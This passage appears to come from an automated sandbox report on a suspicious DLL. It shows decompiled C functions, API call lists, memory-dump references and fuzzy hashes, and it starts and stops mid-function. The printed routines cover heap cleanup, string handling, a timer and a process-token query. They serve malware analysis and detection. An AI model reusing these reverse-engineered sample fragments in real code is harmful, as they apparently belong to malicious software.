				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x4cdd2f4; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x4cdd2a4; // 0x2ec
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x4cdd270; // 0x54c0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                                                                                                          0x04cd4450
                                                                                                                          0x04cd4457
                                                                                                                          0x04cd44a1
                                                                                                                          0x04cd44a3
                                                                                                                          0x04cd44a3
                                                                                                                          0x04cd445b
                                                                                                                          0x04cd4461
                                                                                                                          0x04cd4466
                                                                                                                          0x04cd446a
                                                                                                                          0x04cd4470
                                                                                                                          0x04cd4477
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04cd4479
                                                                                                                          0x04cd447e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04cd447e
                                                                                                                          0x04cd4480
                                                                                                                          0x04cd4488
                                                                                                                          0x04cd448b
                                                                                                                          0x04cd448b
                                                                                                                          0x04cd4491
                                                                                                                          0x04cd4498
                                                                                                                          0x04cd449b
                                                                                                                          0x04cd449b
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • SetEvent.KERNEL32(000002EC,00000001,04CD191C), ref: 04CD445B
                                                                                                                          • SleepEx.KERNEL32(00000064,00000001), ref: 04CD446A
                                                                                                                          • CloseHandle.KERNEL32(000002EC), ref: 04CD448B
                                                                                                                          • HeapDestroy.KERNEL32(054C0000), ref: 04CD449B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseDestroyEventHandleHeapSleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4109453060-0
                                                                                                                          • Opcode ID: 617fd483e6e309d4bd7de7ca164c8d5660e77e581546af69840d252bb525345a
                                                                                                                          • Instruction ID: a2624705560e2907dc329489e3466f8b9a06d7e611fea7ab33c74098d18f8ef0
                                                                                                                          • Opcode Fuzzy Hash: 617fd483e6e309d4bd7de7ca164c8d5660e77e581546af69840d252bb525345a
                                                                                                                          • Instruction Fuzzy Hash: 69F03079B023129BEF246F35E988B5636ADEB04769B050214BA06E7180DB38ED84C664
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E348867, Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,6E346602,00000000,00000001,00000000,00000000,?,6E344244,00000000,00000020,00000000), ref: 6E34887E
                                                                                                                          • GetLastError.KERNEL32(?,6E346602,00000000,00000001,00000000,00000000,?,6E344244,00000000,00000020,00000000,00000000,00000000,?,6E3447A9,00000000), ref: 6E34888A
                                                                                                                            • Part of subcall function 6E348850: CloseHandle.KERNEL32(6E37AA20,6E34889A,?,6E346602,00000000,00000001,00000000,00000000,?,6E344244,00000000,00000020,00000000,00000000,00000000), ref: 6E348860
                                                                                                                          • ___initconout.LIBCMT ref: 6E34889A
                                                                                                                            • Part of subcall function 6E348812: CreateFileW.KERNEL32(6E373F04,40000000,00000003,00000000,00000003,00000000,00000000,6E348841,6E3465EF,00000000,?,6E344244,00000000,00000020,00000000,00000000), ref: 6E348825
                                                                                                                          • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,6E346602,00000000,00000001,00000000,00000000,?,6E344244,00000000,00000020,00000000,00000000), ref: 6E3488AF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2744216297-0
                                                                                                                          • Opcode ID: c91a42db09f3ef581c8e53f63e853d7905be6b9720f1344e63d39fa405beb635
                                                                                                                          • Instruction ID: 578db517e26acda104cf8bda7d6b88d60c01c71f05b3fc5aac2609e43c5ab1ea
                                                                                                                          • Opcode Fuzzy Hash: c91a42db09f3ef581c8e53f63e853d7905be6b9720f1344e63d39fa405beb635
                                                                                                                          • Instruction Fuzzy Hash: F2F03036010624FBCF522FD5CC0899D3F7AFB493A0B104420FA1986124CB32C830EBD4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD4B98, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 37%
                                                                                                                          			E04CD4B98() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x4cdd364; // 0x58b95b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x4cdd364; // 0x58b95b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x4cdd364; // 0x58b95b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x4cde823) {
					HeapFree( *0x4cdd270, 0, _t10);
					_t7 =  *0x4cdd364; // 0x58b95b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                                                                                                          0x04cd4b98
                                                                                                                          0x04cd4ba1
                                                                                                                          0x04cd4bb1
                                                                                                                          0x04cd4bb1
                                                                                                                          0x04cd4bb6
                                                                                                                          0x04cd4bbb
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04cd4bab
                                                                                                                          0x04cd4bab
                                                                                                                          0x04cd4bbd
                                                                                                                          0x04cd4bc2
                                                                                                                          0x04cd4bc6
                                                                                                                          0x04cd4bd9
                                                                                                                          0x04cd4bdf
                                                                                                                          0x04cd4bdf
                                                                                                                          0x04cd4be8
                                                                                                                          0x04cd4bea
                                                                                                                          0x04cd4bee
                                                                                                                          0x04cd4bf4

                                                                                                                          APIs
                                                                                                                          • RtlEnterCriticalSection.NTDLL(058B9570), ref: 04CD4BA1
                                                                                                                          • Sleep.KERNEL32(0000000A,?,04CD5390), ref: 04CD4BAB
                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,04CD5390), ref: 04CD4BD9
                                                                                                                          • RtlLeaveCriticalSection.NTDLL(058B9570), ref: 04CD4BEE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 58946197-0
                                                                                                                          • Opcode ID: 382d1806ac92f47be00c2105c2ff41f929eb47c258c38e8fd6935a994bb83183
                                                                                                                          • Instruction ID: 3a23e8c0c44271189c6dc59e40794284c2fa985c87c415027387eacda5883e5a
                                                                                                                          • Opcode Fuzzy Hash: 382d1806ac92f47be00c2105c2ff41f929eb47c258c38e8fd6935a994bb83183
                                                                                                                          • Instruction Fuzzy Hash: 2AF0D4BCA06600ABEB189F65EA99F2677B9FF55310B044019F603DB250C638FC00DA14
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E332439, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 355COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: _free
                                                                                                                          • String ID: -
                                                                                                                          • API String ID: 269201875-2547889144
                                                                                                                          • Opcode ID: ff176372c32bbe63ee58e99579d8badc4d8a1849a9b4cd7d7d04c74d24b0931a
                                                                                                                          • Instruction ID: 1081a546e9059cf6c094a0deb9376b3a81745d8852a5f8224b7fd0ae3c84bd37
                                                                                                                          • Opcode Fuzzy Hash: ff176372c32bbe63ee58e99579d8badc4d8a1849a9b4cd7d7d04c74d24b0931a
                                                                                                                          • Instruction Fuzzy Hash: F6C108319002B69ADB64DFE4CE50FEAB3B8FF14714F3045AAD84597185FB329A81CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2EA570, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 234COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 6E2F0170: _Max_value.LIBCPMTD ref: 6E2F019C
                                                                                                                            • Part of subcall function 6E2F0170: _Min_value.LIBCPMTD ref: 6E2F01C2
                                                                                                                          • allocator.LIBCONCRTD ref: 6E2EA798
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: Max_valueMin_valueallocator
                                                                                                                          • String ID: 2t.n$2t.n
                                                                                                                          • API String ID: 2697025138-4282282858
                                                                                                                          • Opcode ID: b26ea5b7fc720cee6dff34bcc786ccfdbafdac2deae19289cc34da474882f705
                                                                                                                          • Instruction ID: 78e6eab7611aae2889963efc393e5de1636fcf01ba8558227938186bbf55f6a0
                                                                                                                          • Opcode Fuzzy Hash: b26ea5b7fc720cee6dff34bcc786ccfdbafdac2deae19289cc34da474882f705
                                                                                                                          • Instruction Fuzzy Hash: B1A107B5D0015D9FCB08DFE8D890AEEBBBABF88304F548959E415B7754DB34A901CB60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E327A9D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __startOneArgErrorHandling.LIBCMT ref: 6E327B2D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorHandling__start
                                                                                                                          • String ID: pow
                                                                                                                          • API String ID: 3213639722-2276729525
                                                                                                                          • Opcode ID: 49df0c7b69f1d53f5300d01ef8be082918b0a9f3b84ad72f033ef8bbb2d9fa0b
                                                                                                                          • Instruction ID: 8097282bc89366fb5bcb6b8824dafd5a6599f32b66fa0e88b29f05b443dd97f4
                                                                                                                          • Opcode Fuzzy Hash: 49df0c7b69f1d53f5300d01ef8be082918b0a9f3b84ad72f033ef8bbb2d9fa0b
                                                                                                                          • Instruction Fuzzy Hash: 0F518A61E18253DECB8176F5C950BAB7BB8FB41750F304D78F4E1822D8EB3384959A86
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2EBA20, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: swap
                                                                                                                          • String ID: Dq6n$Dq6n
                                                                                                                          • API String ID: 630424929-2865934346
                                                                                                                          • Opcode ID: fe4135ac29e82f4b7dd3802219cc43c0494b2193611aeb934832d80036543693
                                                                                                                          • Instruction ID: 16b371194dd3bcc28199cf24f8d1eef3749034636c3fd491b62ca37e59106d83
                                                                                                                          • Opcode Fuzzy Hash: fe4135ac29e82f4b7dd3802219cc43c0494b2193611aeb934832d80036543693
                                                                                                                          • Instruction Fuzzy Hash: 30F0FE7AD0021CABCB04DFD4DD518DD777DAF55205F5048AAE80557744EB30AF14DBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD1EC1, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 58%
                                                                                                                          			E04CD1EC1(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E04CD75F6(_t2);
				if(_t34 != 0) {
					_t30 = E04CD75F6(_t28);
					if(_t30 == 0) {
						E04CD4AAB(_t34);
					} else {
						_t39 = _a4;
						_t22 = E04CDA971(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E04CDA971(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                                                                                                          0x04cd1ec1
                                                                                                                          0x04cd1ecb
                                                                                                                          0x04cd1ecd
                                                                                                                          0x04cd1ed3
                                                                                                                          0x04cd1ed3
                                                                                                                          0x04cd1edc
                                                                                                                          0x04cd1ee0
                                                                                                                          0x04cd1eec
                                                                                                                          0x04cd1ef0
                                                                                                                          0x04cd1f64
                                                                                                                          0x04cd1ef2
                                                                                                                          0x04cd1ef2
                                                                                                                          0x04cd1ef6
                                                                                                                          0x04cd1efb
                                                                                                                          0x04cd1f00
                                                                                                                          0x04cd1f1a
                                                                                                                          0x04cd1f09
                                                                                                                          0x04cd1f09
                                                                                                                          0x04cd1f0d
                                                                                                                          0x04cd1f10
                                                                                                                          0x04cd1f15
                                                                                                                          0x04cd1f15
                                                                                                                          0x04cd1f1f
                                                                                                                          0x04cd1f47
                                                                                                                          0x04cd1f4d
                                                                                                                          0x04cd1f50
                                                                                                                          0x04cd1f21
                                                                                                                          0x04cd1f23
                                                                                                                          0x04cd1f2b
                                                                                                                          0x04cd1f36
                                                                                                                          0x04cd1f3b
                                                                                                                          0x04cd1f3b
                                                                                                                          0x04cd1f57
                                                                                                                          0x04cd1f5e
                                                                                                                          0x04cd1f5f
                                                                                                                          0x04cd1f5f
                                                                                                                          0x04cd1ef0
                                                                                                                          0x04cd1f6f

                                                                                                                          APIs
                                                                                                                          • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,04CD5405,00000000,00000000,73BB81D0,058B9618,?,?,04CD2A8A,?,058B9618), ref: 04CD1ECD
                                                                                                                            • Part of subcall function 04CD75F6: RtlAllocateHeap.NTDLL(00000000,00000000,04CD4F70), ref: 04CD7602
                                                                                                                            • Part of subcall function 04CDA971: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04CD1EFB,00000000,00000001,00000001,?,?,04CD5405,00000000,00000000,73BB81D0,058B9618), ref: 04CDA97F
                                                                                                                            • Part of subcall function 04CDA971: StrChrA.SHLWAPI(?,0000003F,?,?,04CD5405,00000000,00000000,73BB81D0,058B9618,?,?,04CD2A8A,?,058B9618,0000EA60,?), ref: 04CDA989
                                                                                                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04CD5405,00000000,00000000,73BB81D0,058B9618,?,?,04CD2A8A), ref: 04CD1F2B
                                                                                                                          • lstrcpy.KERNEL32(00000000,73BB81D0), ref: 04CD1F3B
                                                                                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04CD1F47
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3767559652-0
                                                                                                                          • Opcode ID: 62abeabee0ebf7f60d5e88d9207d6175076babc6bb0e070be6f60e26e959680c
                                                                                                                          • Instruction ID: 744343059a7896e8eb086f13288707336d5a9ea882adfc308d7a60e19c503718
                                                                                                                          • Opcode Fuzzy Hash: 62abeabee0ebf7f60d5e88d9207d6175076babc6bb0e070be6f60e26e959680c
                                                                                                                          • Instruction Fuzzy Hash: F621E436504255AFDB066F74C884BAA7FBAEF05294F088055FA049B201EB35EA00D7A0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD131E, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E04CD131E(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E04CD75F6(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                                                                                                          0x04cd1333
                                                                                                                          0x04cd1337
                                                                                                                          0x04cd1341
                                                                                                                          0x04cd1346
                                                                                                                          0x04cd134b
                                                                                                                          0x04cd134d
                                                                                                                          0x04cd1355
                                                                                                                          0x04cd135a
                                                                                                                          0x04cd1368
                                                                                                                          0x04cd136d
                                                                                                                          0x04cd1377

                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(004F0053,?,73B75520,00000008,058B9364,?,04CD50AD,004F0053,058B9364,?,?,?,?,?,?,04CD54EF), ref: 04CD132E
                                                                                                                          • lstrlenW.KERNEL32(04CD50AD,?,04CD50AD,004F0053,058B9364,?,?,?,?,?,?,04CD54EF), ref: 04CD1335
                                                                                                                            • Part of subcall function 04CD75F6: RtlAllocateHeap.NTDLL(00000000,00000000,04CD4F70), ref: 04CD7602
                                                                                                                          • memcpy.NTDLL(00000000,004F0053,73B769A0,?,?,04CD50AD,004F0053,058B9364,?,?,?,?,?,?,04CD54EF), ref: 04CD1355
                                                                                                                          • memcpy.NTDLL(73B769A0,04CD50AD,00000002,00000000,004F0053,73B769A0,?,?,04CD50AD,004F0053,058B9364), ref: 04CD1368
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlenmemcpy$AllocateHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2411391700-0
                                                                                                                          • Opcode ID: bf03378638d65f9067c3541598caddcf2c338e9a5a273d99d1e5840be836dcd6
                                                                                                                          • Instruction ID: 2404951a194db94d5bbc289c9803e86dac983618f989b42cad5e84c2ae492ac9
                                                                                                                          • Opcode Fuzzy Hash: bf03378638d65f9067c3541598caddcf2c338e9a5a273d99d1e5840be836dcd6
                                                                                                                          • Instruction Fuzzy Hash: 5BF0F976900119BBDF11EFA9CC88C9F7BADEF492987154066FE04D7201EA35EA14DBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD38CA, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • lstrlen.KERNEL32(058B9B10,00000000,00000000,745EC740,04CD467E,00000000), ref: 04CD38DA
                                                                                                                          • lstrlen.KERNEL32(?), ref: 04CD38E2
                                                                                                                            • Part of subcall function 04CD75F6: RtlAllocateHeap.NTDLL(00000000,00000000,04CD4F70), ref: 04CD7602
                                                                                                                          • lstrcpy.KERNEL32(00000000,058B9B10), ref: 04CD38F6
                                                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 04CD3901
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 74227042-0
                                                                                                                          • Opcode ID: d866156b59c5d745ac7f50d58db5d0b08da229d2f834233e04459d057cd0707a
                                                                                                                          • Instruction ID: e44e7fb19f573f7c4b72cfa8d10d0856b6b1c7e6cb5134b0da5fa93299c9b4cc
                                                                                                                          • Opcode Fuzzy Hash: d866156b59c5d745ac7f50d58db5d0b08da229d2f834233e04459d057cd0707a
                                                                                                                          • Instruction Fuzzy Hash: 1CE09A37902620AB8711ABE8AC48D6BBFAEEF896607040416FB00D3100C739AD11CBA2
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Analysis Process: rundll32.exe PID: 6464 Parent PID: 7036 rundll32.exeCOMMON

                                                                                                                          Executed Functions

                                                                                                                          Function 04975D10, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 38%
                                                                                                                          			E04975D10(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E049775F6(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E04974AAB(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                                                                                                          0x04975d1d
                                                                                                                          0x04975d1e
                                                                                                                          0x04975d1f
                                                                                                                          0x04975d20
                                                                                                                          0x04975d21
                                                                                                                          0x04975d25
                                                                                                                          0x04975d2c
                                                                                                                          0x04975d3b
                                                                                                                          0x04975d3e
                                                                                                                          0x04975d41
                                                                                                                          0x04975d48
                                                                                                                          0x04975d4b
                                                                                                                          0x04975d4e
                                                                                                                          0x04975d51
                                                                                                                          0x04975d54
                                                                                                                          0x04975d5f
                                                                                                                          0x04975d61
                                                                                                                          0x04975d6a
                                                                                                                          0x04975d72
                                                                                                                          0x04975d74
                                                                                                                          0x04975d86
                                                                                                                          0x04975d90
                                                                                                                          0x04975d94
                                                                                                                          0x04975da3
                                                                                                                          0x04975da7
                                                                                                                          0x04975db0
                                                                                                                          0x04975db8
                                                                                                                          0x04975db8
                                                                                                                          0x04975dba
                                                                                                                          0x04975dba
                                                                                                                          0x04975dc2
                                                                                                                          0x04975dc8
                                                                                                                          0x04975dcc
                                                                                                                          0x04975dcc
                                                                                                                          0x04975dd7

                                                                                                                          APIs
                                                                                                                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04975D57
                                                                                                                          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04975D6A
                                                                                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04975D86
                                                                                                                            • Part of subcall function 049775F6: RtlAllocateHeap.NTDLL(00000000,00000000,04974F70), ref: 04977602
                                                                                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04975DA3
                                                                                                                          • memcpy.NTDLL(00000000,00000000,0000001C), ref: 04975DB0
                                                                                                                          • NtClose.NTDLL(?), ref: 04975DC2
                                                                                                                          • NtClose.NTDLL(00000000), ref: 04975DCC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2575439697-0
                                                                                                                          • Opcode ID: 678eb124b007b2a5d9200c9b3f26637292177fa883895e3e874288668aa0d726
                                                                                                                          • Instruction ID: 89e90dcfa706352448b4683841698060163ed167e5448c667eb9e5b53d16d444
                                                                                                                          • Opcode Fuzzy Hash: 678eb124b007b2a5d9200c9b3f26637292177fa883895e3e874288668aa0d726
                                                                                                                          • Instruction Fuzzy Hash: D221E676A00218BBDB01DF95CC45EDEBFBDEF48794F108026FA01E6110E7719A459BA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04975461, Relevance: 16.6, APIs: 11, Instructions: 150timememoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 83%
                                                                                                                          			E04975461(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x497d278);
					_v20 = 0;
					_v16 = 0;
					L0497AED0();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x497d2a4; // 0x340
					_v40 = _t51;
